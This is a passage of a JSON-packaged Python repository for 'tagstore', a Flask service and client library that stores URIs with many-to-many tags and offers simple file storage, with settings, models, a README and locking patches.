headers['Content-Length'] = metadata['_content_length']\n except KeyError:\n pass\n\n\n@store_blueprint.route('{0}/ofs/<label>'.format(api_v1_prefix),\n methods=['HEAD', 'GET', 'PUT', 'DELETE'])\ndef ofs_get(label):\n as_attachment = request.headers.get('X-As-Attachment', 'no') == 'yes'\n if request.method == 'HEAD':\n metadata = ofs.call('get_metadata', label)\n headers = {}\n _update_http_headers(headers, metadata, as_attachment)\n response = Response()\n response.headers.extend(headers)\n return response\n elif request.method == 'GET':\n try:\n stream = ofs.call('get_stream', label)\n except Exception as err:\n abort(404)\n else:\n try:\n metadata = ofs.call('get_metadata', label)\n except Exception as err:\n abort(500)\n else:\n # Flask converts the filename to an absolute path by prepending\n # the app directory which is incorrect. 
This is only used to add\n # etags, so just turn that off.\n resp = send_file(stream, add_etags=False)\n _update_http_headers(resp.headers, metadata, as_attachment)\n return resp\n elif request.method == 'PUT':\n try:\n fname = request.form['fname']\n except KeyError:\n pass\n else:\n params = {'fname': fname}\n ofs.call('update_metadata', label, params)\n\n if request.files:\n fobj = request.files['blob']\n ofs.call('put_stream', label, fobj)\n return make_response('', 200)\n elif request.method == 'DELETE':\n try:\n ofs.call('del_stream', label)\n except Exception:\n pass\n return make_response('', 204)\n\n\ndef gc_ofs():\n local_data = Data.query.filter(Data.uri.like('%/api/%/ofs/%')).all()\n present_labels = set([os.path.basename(ddd.uri) for ddd in local_data])\n for label in ofs.call('list_labels'):\n meta = ofs.call('get_metadata', label)\n mtime = datetime.strptime(meta['_last_modified'], '%Y-%m-%dT%H:%M:%S')\n grace_time = datetime.now() - timedelta(seconds=60)\n # Still within the grace period\n if mtime >= grace_time:\n continue\n if label in present_labels:\n continue\n ofs.call('del_stream', label)\n\n\ndef init_app(app):\n with app.app_context():\n db.init_app(app)\n\n app.register_blueprint(zip_blueprint)\n app.register_blueprint(store_blueprint)\n\n manager = APIManager(app, flask_sqlalchemy_db=db)\n manager.create_api(Data, url_prefix=api_v1_prefix,\n max_results_per_page=app.config['MAX_RESULTS_PER_PAGE_DATA'],\n preprocessors={\n 'PATCH_SINGLE': [data_patch_single],\n 'POST': [data_post],\n },\n methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],\n allow_patch_many=True)\n manager.create_api(Tag, url_prefix=api_v1_prefix,\n max_results_per_page=app.config['MAX_RESULTS_PER_PAGE_TAG'],\n preprocessors={\n 'PATCH_SINGLE': [TagPatchSingle.pre],\n 'DELETE': [tag_delete],\n },\n postprocessors={\n 'PATCH_SINGLE': [TagPatchSingle.post],\n },\n methods=['GET', 'PUT', 'PATCH', 'DELETE'],\n include_columns=['id', 'tag'],\n collection_name='tags')\n\n\nif __name__ == \"__main__\":\n import sys\n app = Flask(__name__)\n app.config.from_object('tagstore.settings.default')\n try:\n app.config.from_pyfile(sys.argv[1])\n except IndexError:\n raise IndexError(u'Please supply a configuration file.')\n init_app(app)\n app.run('0.0.0.0', processes=4)\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 23, "blob_id": "da753d65187cf3eecc029adb96ac1c848d8467b7", "content_id": "4833b3812be19cb05c7e03ce61eaf1f766d6e280", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/settings.sample.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "DEBUG = False\nTESTING = False\nSQLALCHEMY_DATABASE_URI = 'sqlite://'\nPTOFS_DIR = 'tagstore-data'\n" }, { "alpha_fraction": 0.611829936504364, "alphanum_fraction": 0.6275416016578674, "avg_line_length": 23.590909957885742, "blob_id": "6bf458b106cfeb4397b346e134f0786f504b27d7", "content_id": "fe39ab241834f6fdf4541ad98ca693fe48a9024a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1082, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/tagstore/models.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "from flask.ext.sqlalchemy import SQLAlchemy\n\nfrom sqlalchemy import UniqueConstraint\n\n\ndb = SQLAlchemy()\n# NOTE: SQLite performance is surprisingly slow.\n\n\ntags = 
db.Table('tags',\n db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')),\n db.Column('data_id', db.Integer, db.ForeignKey('data.id')),\n UniqueConstraint('tag_id', 'data_id'),\n)\n\n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n # http://stackoverflow.com/questions/2659952\n uri = db.Column(db.Unicode(2**11), unique=True)\n\n fname = db.Column(db.Unicode(255))\n\n tags = db.relationship('Tag', secondary=tags,\n backref=db.backref('data', lazy='dynamic'))\n\n def __init__(self, uri, fname=None):\n self.uri = uri\n self.fname = fname\n\n def __repr__(self):\n return u'<Data {0!r}>'.format(self.uri)\n\n\nclass Tag(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n tag = db.Column(db.Unicode(2**9), unique=True)\n\n def __init__(self, tag):\n self.tag = tag\n\n def __repr__(self):\n return u'<Tag {0!r}>'.format(self.tag)\n" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8529411554336548, "avg_line_length": 12.600000381469727, "blob_id": "d282c2f7925f37df4c3335423f928acdb221987e", "content_id": "2f921e51f083115679ec3923e2f4760414190fbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 68, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/requirements-server.txt", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "Flask-SQLAlchemy\nFlask-Restless\nofs\nPairtree\ntempfilezipstream>=2.0\n" }, { "alpha_fraction": 0.5603407621383667, "alphanum_fraction": 0.5687016844749451, "avg_line_length": 34.21666717529297, "blob_id": "f08c7e869cac2d3758b186790a729acbe5c38c69", "content_id": "09d1bdb5d2518477faba19baf0727c2cb954536c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12678, "license_type": "no_license", "max_line_length": 83, "num_lines": 360, "path": "/tagstore/client.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import os.path\nfrom copy import copy\nfrom urlparse import urlunsplit, urlsplit\nfrom uuid import uuid4\nimport logging\n\nlog = logging.getLogger(__name__)\n\nimport requests\n\n\nimport json\n\n\nclass DataResponse(object):\n def __init__(self, client, json):\n self.client = client\n self.id = json['id']\n self.fname = json['fname']\n self.uri = json['uri']\n self.tags = [tag['tag'] for tag in json['tags']]\n\n @property\n def filename(self):\n return self.fname\n\n def open(self):\n return requests.get(self.uri, stream=True).raw\n\n def __repr__(self):\n return '<DataResponse({0}, {1}, {2}, {3})>'.format(\n self.id, self.uri, self.fname, self.tags)\n\n\nclass TagResponse(object):\n def __init__(self, client, json):\n self.client = client\n self.id = json['id']\n self.tag = json['tag']\n\n def __repr__(self):\n return '<TagResponse({0}, {1})>'.format(self.id, self.tag)\n\n\ndef ensure_response_status(response, *statuses):\n \"\"\"Assert that the requests response status is in statuses.\"\"\"\n assert response.status_code in statuses, '{0} {1} -> {2}'.format(\n response.request.method, response.request.url, response.status_code)\n\n\nclass QueryResponse(object):\n def __init__(self, client, endpoint, wrapper, params, preload=False):\n self.client = client\n self.endpoint = endpoint\n self.wrapper = wrapper\n self.params = params\n\n self.objects = []\n self.iii = 0\n self.page = 1\n\n self.get_page()\n if preload:\n while self.page < self.num_pages:\n self.page += 1\n # Some large number because fewer pages is better here\n self.get_page(self.page, 
self.client.preload_page_num_results)\n\n    @classmethod\n def query(cls, endpoint, client, params):\n return requests.get(client._api_endpoint(endpoint), params=params,\n headers=client.headers_json)\n\n def get_page(self, page=None, results_per_page=None):\n params = copy(self.params)\n if page is not None:\n if page > self.num_pages:\n raise IndexError()\n params['page'] = page\n if results_per_page is None:\n results_per_page = self.client.results_per_page\n params['results_per_page'] = results_per_page\n\n response = self.query(self.endpoint, self.client, params)\n ensure_response_status(response, 200)\n\n json = response.json()\n self.objects += [self.wrapper(self.client, obj) for obj in json['objects']]\n self.num_pages = json['total_pages']\n self.num_results = json['num_results']\n\n def __getitem__(self, value):\n try:\n return self.objects[value]\n except IndexError:\n self.page += 1\n self.get_page(self.page)\n return self[value]\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.iii >= len(self.objects):\n if self.page >= self.num_pages:\n raise StopIteration\n else:\n self.page += 1\n self.get_page(self.page)\n self.iii += 1\n # If you get an error here, you might be editing the results of the\n # query while using the results.\n return self.objects[self.iii - 1]\n\n def __len__(self):\n return self.num_results\n\n def __repr__(self):\n return '<QueryResponse({0}, {1})>'.format(self.endpoint, len(self))\n\n\nclass TagStoreClient(object):\n headers_json = {'Content-Type': 'application/json'}\n\n def __init__(self, endpoint, results_per_page=500,\n preload_page_num_results=1000):\n self.endpoint = endpoint\n\n self.preload_page_num_results = preload_page_num_results\n self.results_per_page = results_per_page\n\n def _api_endpoint(self, *segments):\n return '/'.join([self.endpoint] + map(unicode, segments))\n\n def _wrap_tag(self, tag):\n \"\"\"Wrap a Tag for restless.\"\"\"\n assert isinstance(tag, basestring)\n return dict(tag=tag)\n\n def _data(self, uri, fname, tags):\n \"\"\"JSON representation of a Datum.\"\"\"\n return dict(uri=uri, fname=fname, tags=map(self._wrap_tag, tags))\n\n def create(self, uri_or_fobj, fname=None, tags=[]):\n \"\"\"Create a Datum.\"\"\"\n if not isinstance(uri_or_fobj, basestring):\n # Store the file first.\n fobj = uri_or_fobj\n if fname is None:\n try:\n fname = fobj.name\n except AttributeError:\n fname = 'blob'\n files = {'blob': (fname, fobj)}\n resp = requests.post(self._api_endpoint('ofs'), files=files)\n ensure_response_status(resp, 200, 201)\n data = resp.json()\n uri = data['uri']\n else:\n uri = uri_or_fobj\n if fname is None:\n fname = os.path.basename(uri)\n if not fname:\n fname = 'blob'\n\n data = json.dumps(self._data(uri, fname, tags))\n response = requests.post(self._api_endpoint('data'),\n data=data, headers=self.headers_json)\n ensure_response_status(response, 201, 409)\n if response.status_code == 201:\n return DataResponse(self, response.json())\n else:\n return None\n\n def edit(self, instanceid, uri_or_fobj=None, fname=None, tags=None):\n \"\"\"Edit a Datum.\"\"\"\n data_endpoint = self._api_endpoint('data', unicode(instanceid))\n resp = requests.get(data_endpoint)\n ensure_response_status(resp, 200)\n dresp = DataResponse(self, resp.json())\n data = {}\n if uri_or_fobj is not None:\n uri = dresp.uri\n if not isinstance(uri_or_fobj, basestring):\n # Update the stored file\n fobj = uri_or_fobj\n resp = requests.put(uri, files={'blob': fobj})\n ensure_response_status(resp, 200)\n else:\n # Update the URI\n if uri != uri_or_fobj:\n raise ValueError(u'Attempt to update blob while changing URI.')\n else:\n data['uri'] = uri\n if fname is not None:\n data['fname'] = fname\n # If file is stored locally, also change its fname\n if self._is_local(dresp.uri) and dresp.fname != fname:\n response = requests.put(dresp.uri, data=dict(fname=fname))\n if tags is not None:\n data['tags'] = map(self._wrap_tag, tags)\n data = json.dumps(data)\n response = requests.put(data_endpoint, data=data,\n headers=self.headers_json)\n assert response.status_code == 200\n return DataResponse(self, response.json())\n\n def swap_tags(self, tag_old, tag_new, *filters, **kwargs):\n \"\"\"Swap out old tag for new tag for all Data that match.\"\"\"\n told = self.query_tags(['tag', 'eq', tag_old], limit=1, single=True)\n tnew = self.query_tags(['tag', 'eq', tag_new], limit=1, single=True)\n data = dict(tags={})\n if tnew:\n add_term = [dict(id=tnew.id)]\n else:\n add_term = [self._wrap_tag(tag_new)]\n data['tags']['remove'] = [dict(id=told.id)]\n\n # Two cases, in order\n # If add does not happen first it will be deleted and replace will not\n # happen.\n # 1. new tag not present, add new and remove old tag\n # 2. new tag already present, just remove old tag\n case2_filters = [['tags__tag', 'any', tag_old]] + list(filters)\n case1_filters = [['tags__tag', 'not_any', tag_new]] + case2_filters\n\n data['q'] = self.list_to_q(*case1_filters, **kwargs)\n data['tags']['add'] = add_term\n response = requests.put(self._api_endpoint('data'), data=json.dumps(data),\n headers=self.headers_json)\n ensure_response_status(response, 200)\n\n data['q'] = self.list_to_q(*case2_filters, **kwargs)\n del data['tags']['add']\n response = requests.put(self._api_endpoint('data'), data=json.dumps(data),\n headers=self.headers_json)\n ensure_response_status(response, 200)\n\n def edit_tag(self, instanceid, tag):\n \"\"\"Edit a Tag.\"\"\"\n tag_endpoint = self._api_endpoint('tags', unicode(instanceid))\n data = json.dumps(self._wrap_tag(tag))\n response = requests.put(tag_endpoint, data=data,\n headers=self.headers_json)\n ensure_response_status(response, 200)\n return TagResponse(self, response.json())\n\n @classmethod\n def _tagobjs_to_tags(cls, tagobjs):\n return [tagobj['tag'] for tagobj in tagobjs]\n\n @classmethod\n def get_tag_value(cls, tagobjs, key):\n for tag in cls._tagobjs_to_tags(tagobjs):\n if tag.startswith(u'{0}:'.format(key)):\n return tag[len(key) + 1:]\n return None\n\n def _is_local(self, uri):\n return uri.startswith(self._api_endpoint('ofs'))\n\n def delete(self, instanceid):\n \"\"\"Delete a Datum.\"\"\"\n # If file is stored locally, delete it\n data_endpoint = self._api_endpoint('data', unicode(instanceid))\n resp = requests.get(data_endpoint)\n if resp.status_code == 200:\n obj = DataResponse(self, resp.json())\n if self._is_local(obj.uri):\n response = requests.delete(obj.uri)\n response = requests.delete(data_endpoint)\n ensure_response_status(response, 204)\n return None\n\n def delete_tag(self, instanceid):\n \"\"\"Delete a Tag.\"\"\"\n tag_endpoint = self._api_endpoint('tags', unicode(instanceid))\n response = requests.delete(tag_endpoint)\n ensure_response_status(response, 204, 409)\n if response.status_code == 409:\n raise ValueError(u'Tag is still in use.')\n return None\n\n def _query(self, endpoint, wrapper, *filters, **kwargs):\n \"\"\"Query the tag store for objects that satisfy the filters.\n\n filters - many 3-ples consisting of name, operation, and value.\n \n See 
https://flask-restless.readthedocs.org/en/latest/\n searchformat.html#query-format\n\n The search format is simplified from a dictionary to a 3-ple and\n automatically reconstructed.\n\n \"\"\"\n try:\n preload = kwargs['preload']\n except KeyError:\n preload = False\n else:\n del kwargs['preload']\n \n params = dict(q=json.dumps(self.list_to_q(*filters, **kwargs)))\n if kwargs.get('single', False):\n single = QueryResponse.query(endpoint, self, params)\n if single.status_code == 200:\n return wrapper(self, single.json())\n elif single.status_code == 400:\n raise ValueError(u'Multiple results, try limit?')\n return None\n return QueryResponse(self, endpoint, wrapper, params, preload)\n\n def query_data(self, *filters, **kwargs):\n \"\"\"Query the tagstore for Data that satisfy the filters.\n\n See _query() for details.\n\n \"\"\"\n return self._query('data', DataResponse, *filters, **kwargs)\n\n def query_tags(self, *filters, **kwargs):\n \"\"\"Query the tag store for Tags that satisfy the filters.\n\n See _query() for details.\n\n \"\"\"\n return self._query('tags', TagResponse, *filters, **kwargs)\n\n @classmethod\n def _filter(cls, name=None, op=None, val=None):\n \"\"\"Shorthand to create a filter object for REST API.\"\"\"\n return dict(name=name, op=op, val=val)\n\n @classmethod\n def _list_to_filter(cls, lll):\n \"\"\"Convert the client's 3-ple filter format to that of restless.\"\"\"\n name, op, val = lll\n if isinstance(val, tuple) or isinstance(val, list):\n val = cls._list_to_filter(val)\n return cls._filter(name, op, val)\n\n @classmethod\n def _wrap_filters(cls, filters, **kwargs):\n \"\"\"Wrap the filters for restless.\"\"\"\n assert isinstance(filters, tuple) or isinstance(filters, list)\n return dict(filters=filters, **kwargs)\n\n @classmethod\n def list_to_q(cls, *filters, **kwargs):\n return cls._wrap_filters(map(cls._list_to_filter, filters), **kwargs)\n\n\nclass Query(object):\n \"\"\"Collection of methods to generate common queries.\"\"\"\n @classmethod\n def tags_any(cls, op, value):\n return ['tags', 'any', ['tag', op, value]]\n" }, { "alpha_fraction": 0.7268421053886414, "alphanum_fraction": 0.7315789461135864, "avg_line_length": 39.30434799194336, "blob_id": "faf0b70400e8cb00a9fe55a55a4901aab94be8c2", "content_id": "15ea93eb0ab88df7e9bc624ba87685f9da3f2353", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 730, "num_lines": 46, "path": "/README.txt", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "========\r\nTagstore\r\n========\r\n\r\nSummary\r\n-------------\r\n\r\nTagstore provides storage and querying of URI and tag relationships. For\r\nexample, a URI \"http://example.com\" could be stored with multiple tags\r\n\"website:example\" and \"type:example\". Tags are allowed to be any Unicode.\r\n\r\nMotivation\r\n--------------\r\n\r\nOrganization and presentation of data is fundamental to making it useful. Storage is critical, but secondary. Fortunately, URIs refer to data on a network, precluding the need to store data locally. We often organize data in hierarchies, for example, filesystems might organize data by ocean, then year, then cruise, as directories. Tags provide a flexible organization method that allow for different views to be created based on tag values. Perhaps organizing data by the instrument used to collect it or by the time it was collected is more important than ocean first. 
One can continue to provide a filesystem-like view by using tags with paths as their values. Additional tags can allow for different views of the stored data.\r\n\r\nObject storage\r\n--------------------\r\n\r\nAs a convenience, tagstore also provides storage of files through OFS's PTOFS.\r\nThis allows for indirectly tagging of files by storing first and tagging the\r\nresulting URI.\r\n\r\nTag conventions\r\n----------------------\r\n\r\nAs tags can be arbitrary, it is prudent to establish some external order before\r\nusing tagstore. The CCHDO's tagging conventions are laid out here:\r\nhttps://docs.google.com/document/d/13u8qybFouIcR92vXm_OEgsP2DrMvf_nkJKYGmlE78V8/edit\r\n\r\nAPI\r\n-----\r\n\r\n``GET /data``\r\n\r\n``GET /tags``\r\n\r\n``GET /ofs``\r\n\r\n``POST /ofs``\r\n\r\nDetails\r\n---------\r\n\r\nTags are stored in a database where URIs have a many-to-many relationship with tags.\r\nObject storage is provided by a client that is aware of certain URIs being stored by tagstore. It writes the file to the OFS, then stores the available URI in tagstore.\r\n" }, { "alpha_fraction": 0.6995515823364258, "alphanum_fraction": 0.7623318433761597, "avg_line_length": 30.85714340209961, "blob_id": "15bf26f8bae3738a246b6051bd0632d944930456", "content_id": "a22f48e442b3ad75de026a0b0d60808c791e54ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 72, "num_lines": 7, "path": "/tagstore/settings/test.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "# Having DEBUG true causes this\n# https://github.com/jarus/flask-testing/issues/33#issuecomment-31589822\nDEBUG = False\nTESTING = True\nSQLALCHEMY_DATABASE_URI = 'sqlite://'\nLIVESERVER_PORT = 8943\nPTOFS_DIR = 'tagstore-test'\n" }, { "alpha_fraction": 0.5201254487037659, "alphanum_fraction": 0.5300574898719788, "avg_line_length": 28.890625, "blob_id": "e8bf90e624cbf93894df193505a9913f4a4f3fc1", "content_id": "9813d5b0fc6bc2eaa86670af81866c750c634b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1913, "license_type": "no_license", "max_line_length": 76, "num_lines": 64, "path": "/tagstore/patch/lockfile.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom logging import getLogger, CRITICAL\nfrom time import sleep\nfrom uuid import getnode\n\nfrom tagstore.vendor.lockfile import (\n LockFile, LockError, NotLockedError, TimeOutError, AlreadyLockedError\n)\n\n\nlog = getLogger(__name__)\n\n\ndef lockpath(basepath, name):\n return os.path.abspath(os.path.join(basepath, '.lock-{0}'.format(name)))\n\n\nclass RLockFile(object):\n def __init__(self, name):\n self.name = name\n self.lock = LockFile(self.name)\n self.pidfile = self.name + '.pid'\n self.locks = 0\n\n def acquire(self):\n \"\"\"Spin until locked.\n\n Acquire is reentrant.\n\n \"\"\"\n pid = '{0}_{1}'.format(getnode(), os.getpid())\n while True:\n log.debug('acquiring {0} {1}'.format(self.name, pid))\n try:\n self.lock.lock(timeout=1e-6)\n except (TimeOutError, AlreadyLockedError) as error:\n try:\n lockpid = open(self.pidfile, 'r').read()\n except (IOError, OSError, ValueError):\n lockpid = None\n # If locked and pid is the same, this is reentrant.\n log.debug('{0} {1}'.format(lockpid, pid))\n if lockpid == pid:\n log.debug(u'reentrant acquisition')\n self.locks += 1\n break\n else:\n with open(self.pidfile, 'w') as fff:\n fff.write(pid)\n break\n 
sleep(0.5)\n log.debug('acquired {0} {1}'.format(self.name, pid))\n\n def release(self):\n #if self.locks != 0:\n # self.locks -= 1\n # log.debug('released reentrance {0}'.format(self.name))\n # return\n try:\n self.lock.unlock()\n except (AttributeError, NotLockedError):\n pass\n log.debug('released {0}'.format(self.name))\n" }, { "alpha_fraction": 0.6814814805984497, "alphanum_fraction": 0.6814814805984497, "avg_line_length": 37.57143020629883, "blob_id": "aa4c6c351284cf246e7d1f02f3869d2619a2be67", "content_id": "521a173f176e76c789de5618c4f12759953a6d81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/tagstore/patch/restless.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "\"\"\"Add operators to restless\"\"\"\nfrom flask.ext.restless import search\n\n\nsearch.OPERATORS['not_any'] = lambda f, a, fn: ~f.any(search._sub_operator(f, a, fn))\nsearch.OPERATORS['not_ilike'] = lambda f, a: ~f.ilike(a)\nsearch.OPERATORS['not_like'] = lambda f, a: ~f.like(a)\n" }, { "alpha_fraction": 0.652046799659729, "alphanum_fraction": 0.6562238931655884, "avg_line_length": 33.20000076293945, "blob_id": "903fe8dbf8caae603041bfc6f771359347fd7d72", "content_id": "1c6dcd1f3665094374f07d226fb788e070e368da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, "license_type": "no_license", "max_line_length": 82, "num_lines": 70, "path": "/tagstore/patch/ptofs.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "\"\"\"Patch ofs.local.storedjson.PersistentState to be more threadsafe\n\n* Prevent concurrent access to persistence file\n* Prevent concurrent access to PersistentState by PTOFS (This will also prevent\nconcurrent read and write to PTOFS)\n\n\"\"\"\n\nimport os\nimport os.path\nfrom ofs.local import PTOFS\nfrom ofs.local.storedjson import PersistentState, PERSISTENCE_FILENAME\nfrom logging import getLogger, DEBUG, WARN\n\nfrom lockfile import RLockFile, lockpath\n\n\nlog = getLogger(__name__)\nlog.setLevel(WARN)\n\n\ndef patch_ptofs(storage_dir):\n persistence_lock = RLockFile(lockpath(storage_dir, 'persistence'))\n ptofs_lock = RLockFile(lockpath(storage_dir, 'ptofs'))\n\n old_revert = PersistentState.revert \n def new_revert(self):\n log.debug('lock persist acquiring {0}'.format(os.getpid()))\n persistence_lock.acquire()\n log.debug('lock persist acquired {0}'.format(os.getpid()))\n try:\n old_revert(self)\n finally:\n persistence_lock.release()\n log.debug('lock persist released {0}'.format(os.getpid()))\n PersistentState.revert = new_revert\n\n old_sync = PersistentState.sync\n def new_sync(self):\n log.debug('lock persist acquiring {0}'.format(os.getpid()))\n persistence_lock.acquire()\n log.debug('lock persist acquired {0}'.format(os.getpid()))\n try:\n old_sync(self)\n finally:\n persistence_lock.release()\n log.debug('lock persist released {0}'.format(os.getpid()))\n PersistentState.sync = new_sync\n\n old_init = PersistentState.__init__\n def new_init(self, filepath=None, filename=PERSISTENCE_FILENAME, create=True):\n log.debug('lock PTOFS acquiring {0}'.format(os.getpid()))\n ptofs_lock.acquire()\n log.debug('lock PTOFS acquired {0}'.format(os.getpid()))\n old_init(self, filepath, filename, create)\n PersistentState.__init__ = new_init\n\n try:\n old_del = PersistentState.__del__\n except AttributeError:\n old_del = lambda x: None\n def new_del(self):\n 
old_del(self)\n # Release PTOFS lock whenever persisted state is collected.\n try:\n ptofs_lock.release()\n log.debug('lock PTOFS released {0}'.format(os.getpid()))\n except RuntimeError:\n log.error('lock PTOFS failed to release {0}'.format(os.getpid()))\n PersistentState.__del__ = new_del\n" }, { "alpha_fraction": 0.6703296899795532, "alphanum_fraction": 0.7362637519836426, "avg_line_length": 29.33333396911621, "blob_id": "d546d127522a45d4d48cd44a1631b232e6618999", "content_id": "023f58da2d292405c09976747a42344780a1f114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/tagstore/settings/default.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "PTOFS_DIR = 'tagstore-data'\nMAX_RESULTS_PER_PAGE_DATA = 200\nMAX_RESULTS_PER_PAGE_TAG = 500\n" } ]
12
tejaswinikurane/Data-Science-Assignments
https://github.com/tejaswinikurane/Data-Science-Assignments
ffe286839d4b341742af7b68292a6e0ab131626a
9fd61c65d26cb36989db86b4d84c4caa10b2a8b3
324a9813da6a218f60d39af4af2c3f550d28da5d
refs/heads/main
2023-05-12T21:52:17.889014
2021-06-02T15:55:09
2021-06-02T15:55:09
342,162,675
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.668433427810669, "alphanum_fraction": 0.6884570121765137, "avg_line_length": 33.010311126708984, "blob_id": "8915645881726c73026e27c786e9c733a014c5c8", "content_id": "e9dbfd4b7a2a0b680cdfea3c73fc41fc67d25729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3396, "license_type": "no_license", "max_line_length": 100, "num_lines": 97, "path": "/NN/ANN.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 5 08:44:06 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndf = pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\NN\\\\forestfires.csv\")\r\n\r\n#As dummy variables are already created, we will remove the month and day columns\r\ndf.drop([\"month\",\"day\"],axis=1,inplace = True)\r\n\r\ndf[\"size_category\"].value_counts()\r\ndf.isnull().sum()\r\ndf.describe()\r\n\r\n##small = 0, large = 1\r\ndf.loc[df[\"size_category\"]=='small','size_category']=0\r\ndf.loc[df[\"size_category\"]=='large','size_category']=1\r\ndf[\"size_category\"].value_counts()\r\n\r\n#Defining Normalization function\r\ndef norm_func(i):\r\n    x = (i-i.min())/(i.max()-i.min())\r\n    return (x)\r\n\r\n#separating predictors and target variables\r\npredictors = df.iloc[:,0:28]\r\ntarget = df.iloc[:,28]\r\n\r\n#normalizing the predictors\r\npredictors1 = norm_func(predictors)\r\n#data = pd.concat([predictors1,target],axis=1)\r\n\r\n#splitting the data into train and test datasets\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test= train_test_split(predictors1,target, test_size=0.3,stratify = target)\r\n\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation,Layer,Lambda\r\ndef prep_model(hidden_dim):\r\n    model = Sequential()\r\n    for i in range(1,len(hidden_dim)-1):\r\n        if (i==1):\r\n            model.add(Dense(hidden_dim[i],input_dim=hidden_dim[0],activation=\"relu\"))\r\n        else:\r\n            model.add(Dense(hidden_dim[i],activation=\"relu\"))\r\n    model.add(Dense(hidden_dim[-1],kernel_initializer=\"normal\",activation=\"sigmoid\"))\r\n    model.compile(loss=\"binary_crossentropy\",optimizer = \"rmsprop\",metrics = [\"accuracy\"])\r\n    return model \r\n\r\n#y_train = pd.DataFrame(y_train)\r\n\r\n#building the model\r\nfirst_model = prep_model([28,50,40,20,1])\r\nfirst_model.fit(np.array(x_train),np.array(y_train),epochs=500)\r\npred_train = first_model.predict(np.array(x_train))\r\n\r\n#Converting the predicted values to series \r\npred_train = pd.Series([i[0] for i in pred_train])\r\n\r\n#predictions of class for train data\r\nsize = [\"small\",\"large\"]\r\npred_train_class = pd.Series([\"small\"]*361)\r\npred_train_class[[i>0.5 for i in pred_train]]= \"large\"\r\n\r\ntrain = pd.concat([x_train,y_train],axis=1)\r\ntrain[\"size_category\"].value_counts()\r\n\r\n#metrics of success for training data\r\nfrom sklearn.metrics import confusion_matrix\r\ntrain[\"original_class\"] = \"small\"\r\ntrain.loc[train[\"size_category\"]==1,\"original_class\"] = \"large\"\r\ntrain.original_class.value_counts()\r\nconfusion_matrix(pred_train_class,train[\"original_class\"])\r\nnp.mean(pred_train_class==pd.Series(train[\"original_class\"]).reset_index(drop=True)) #100%\r\npd.crosstab(pred_train_class,pd.Series(train[\"original_class\"]).reset_index(drop=True))\r\n\r\n#metrics of success for test data\r\npred_test = first_model.predict(np.array(x_test))\r\npred_test = 
pd.Series([i[0] for i in pred_test])\r\npred_test_class = pd.Series([\"small\"]*156)\r\npred_test_class[[i>0.5 for i in pred_test]] = \"large\"\r\ntest =pd.concat([x_test,y_test],axis=1)\r\ntest[\"original_class\"]=\"small\"\r\ntest.loc[test[\"size_category\"]==1,\"original_class\"] = \"large\"\r\n\r\ntest[\"original_class\"].value_counts()\r\nnp.mean(pred_test_class==pd.Series(test[\"original_class\"]).reset_index(drop=True)) # 89.10%\r\nconfusion_matrix(pred_test_class,test[\"original_class\"])\r\npd.crosstab(pred_test_class,pd.Series(test[\"original_class\"]).reset_index(drop=True))\r\n" }, { "alpha_fraction": 0.6728032231330872, "alphanum_fraction": 0.6925185918807983, "avg_line_length": 32.18303680419922, "blob_id": "50d10ad4c2c546830913b773682d92307805adb3", "content_id": "c2bae8d85e1f524d4acf8f90fdec37e7f247b513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7659, "license_type": "no_license", "max_line_length": 117, "num_lines": 224, "path": "/Forecasting/airlines.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 20 21:43:48 2020\r\n\r\n@author: 